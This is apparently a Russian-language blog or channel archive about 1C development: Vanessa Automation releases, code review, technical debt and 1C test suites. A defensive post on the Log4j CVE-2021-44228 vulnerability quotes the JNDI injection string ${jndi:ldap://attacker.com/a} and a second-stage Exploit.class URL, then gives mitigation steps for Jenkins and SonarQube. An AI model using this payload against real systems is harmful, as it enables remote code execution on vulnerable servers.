Александр Кунташов — про 1С и не только

2021-12-28 19:50:21 В Vanessa Automation очередной большой релиз, обо всем подробно написала Вика в новости, повторяться не буду:

https://infostart.ru/journal/news/mir-1s/vanessa-automation-1-2-038-interaktivnaya-spravka-i-testirovanie-mobilnykh-prilozheniy_1576937/

Но отмечу пару интересных фич:

— Интерактивные уроки, реализованные средствами VA. В дополнение к ним недавно (в этом релизе пока нет) Дима Шерстобитов придумал/добавил механизм для реализации онбординга/интерактивного обучения пользователей, которое можно реализовать и внедрить прямо в информационной базе.

— Поддержка тестирования мобильного клиента и приложений на мобильной платформе (соответствующее API в платформе 1С:Предприятия было добавлено в релизах 8.3.19 и в 8.3.20 соответственно). Как я понимаю, тут тоже Дмитрий приложил руку. Открыть/Комментировать

2021-12-23 12:57:49 Вы наверное уже догадались, но теперь официально (с)!

Сегодня вечером в 19.00 по Москве будет проходить онлайн-игра "Что, Где, Когда" "Что, Если, Тогда".

Помимо интересных вопросов от телезрителей будут ещё и музыкальные паузы, в том числе с вот теми ребятами из Весёлого1С, которые сочиняли текст про "внешне все красиво, внутри полный одинэс".

Заглядывайте на огонёк, будут премьеры ;)

https://infostart.ru/journal/news/mir-1s/komanda-telezriteley-sobrana-proverim-znaniya-znatokov-na-onlayn-igre-chto-esli-togda_1575357/ Открыть/Комментировать

2021-12-13 09:55:58 Уязвимость в библиотеке Log4j в экосистеме Java

Думаю многие, как и мы привыкли в стеке разработки использовать такие сервисы как Jenkins и SonarQube. Эти приложения написаны на языке Java и могут быть подвержены уязвимости CVE-2021-44228, исходящей от библиотеки Log4j версии 2.

Проблема вызвана тем, что Log4j2 поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой ${jndi:ldap://attacker.com/a}, при обработке которой Log4j 2 отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения (информация взята из источника).

Как себя обезопасить?

Jenkins

В Jenkins Core эта библиотека не используется, но не исключает ее наличие в плагинах. Для проверки наличия уязвимости вам нужно зайти в Консоль сценариев (Настроить Jenkins -> Управление средами сборки -> узел master или built-in -> Консоль сценариев) и выполнить скрипт:

org.apache.logging.log4j.core.lookup.JndiLookup.class.protectionDomain.codeSource

Если выполнение скрипта привело к ошибке вида groovy.lang.MissingPropertyException: No such property: org for class: Script1, то библиотека Log4j2 в плагинах не используется.

Но если будет выведен путь и имя плагина, где все же используется библиотека, вам нужно будет удалить этот плагин, перезапустить сервис Jenkins и повторно выполнить скрипт в Консоли сценариев.

Официальный источник информации: Apache Log4j 2 vulnerability CVE-2021-44228.

SonarQube

Что касается сервиса SonarQube, то библиотека используется только в модуле ElasticSearch. Чтобы обезопасить сервис, нужно в конфигурационный файл SonarQube или переменную среды добавить -Dlog4j2.formatMsgNoLookups=true.

В конфигурационном файле sonar.properties нужно добавить или изменить настройку sonar.search.javaAdditionalOpts, например:

sonar.search.javaAdditionalOpts=-Dlog4j2.formatMsgNoLookups=true

Или через переменную среды в системе, контейнере и т.п:

SONAR_SEARCH_JAVAADDITIONALOPTS=-Dlog4j2.formatMsgNoLookups=true

После указания настройки нужно перезапустить сервис SonarQube.

Официальный источник информации: SonarQube and the Log4J vulnerability. Открыть/Комментировать

2021-11-28 11:12:01 Тяжёлый выбор

https://mobile.twitter.com/fillpackart/status/1464506861743493126 Открыть/Комментировать

2021-11-18 18:10:14 Ох, какую знакомую боль Самат описал. Уверен, вы тоже с таким сталкивались:

Начинается новый бизнес, сильно завязанный на софте. Первое время, все классно: один программист — хорошо, два — почти в два раза лучше. 10 программистов — можно делать вещи, о которых раньше и помыслить было нельзя.

Через 3-6 лет в компании уже 50 разработчиков. Продукт при этом практически не развивается, фичи доставляются разработкой в продакшен со скорость улитки. Добавьте к этому зарплаты разработчиков в 100-400 тысяч в месяц и вы можете представить, что чувствует бизнес. Почему так?

А происходило вот что: все эти годы, каждый раз, когда нужно было выбрать между «сделать фичу побыстрее прямо сейчас» и «сделать так, чтобы это можно было потом поддерживать, пусть и подольше прямо сейчас» — бизнес с разработкой вместе выбирали первый вариант. Логично, что рано или поздно гора неподдерживабельного кода становится слишком высокой и уже никто не может докинуть ещё что-то сверху.

(Продолжение см. по ссылке) Открыть/Комментировать

2021-11-13 16:31:06 Открыть/Комментировать

2021-11-13 16:31:03 На только что прогремевшем Infostart Event 2021 Moscow Premiere во второй день конференции был квест, одним из заданий которого была вот такая задачка, которую мы придумали с коллегами из ИТ-лаборатории Инфостарта. Технари решали самостоятельно, а управленцам нужно было найти программиста, который бы ее решил.

Попробуете тоже решить? Открыть/Комментировать

2021-11-04 23:36:43 Принципиально отказывался от публикации рекламы в этом канале, но она теперь тут добровольно-принудительно Открыть/Комментировать

2021-11-04 09:54:01 Некоторое время назад я проводил опрос про код-ревью — хотел написать статью на эту тему и собирал к ней материал.

Подготовка к конференции и другие интересные рабочие задачи перетянули максимум внимания на себя, и черновик статьи, как бывает, ушел в стол.

А на прошлой неделе ютуб мне в рекомендациях подогнал свежее видео Яндекс.Академии с крутой лекцией Сергея Хандрикова о код-ревью:





Там более 2х часов систематизированной информации о код-ревью. И нет, это не что-то абстрактное и академическое, а реальные практические советы. Там не только, что я хотел написать, а гораздо больше, более системно и без воды (что для двухчасового видео удивительно).

Особенно понравилось, что Сергей рассказал о код-ревью с обеих сторон: и с точки зрения автора кода, и с точки зрения ревьюера и разобрал различные типичные сценарии диалогов между ними в процессе ревью.

Есть в конце про нюансы код-ревью опенсорсных проектов.

Обязательно для просмотра всем кто так или иначе связан с разработкой и независимо от того, проводит ли код-ревью ваша команда или нет. Открыть/Комментировать

2021-11-03 13:24:24 Вчера буквально в одном из чатов по 1С, в котором состою, в очередной раз сетовали, что очень нехватает тестов штатного функционала для типовых конфигураций, которые бы с ними поставлялись: и для проведения автоматических регрессионных проверок после собственных доработок и в качестве примера "как надо делать".

И вот, пожалуйста, комплект сценарных тестов для 1С:УХ:

https://infostart.ru/journal/news/mir-1s/firma-1s-vylozhila-komplekt-avtomatizirovannogo-testirovaniya-1s-ukh_1545003/

Справедливости ради, отмечу, что для УНФ в поставку давно включаются сценарии поведения, и в ERP. Сценарии поведения в составе в УНФ мне лично очень нравится, как они сделаны. Рекомендую всем, кто разбирается, опираться на них в качестве примеров по крайней мере в начале пути. Открыть/Комментировать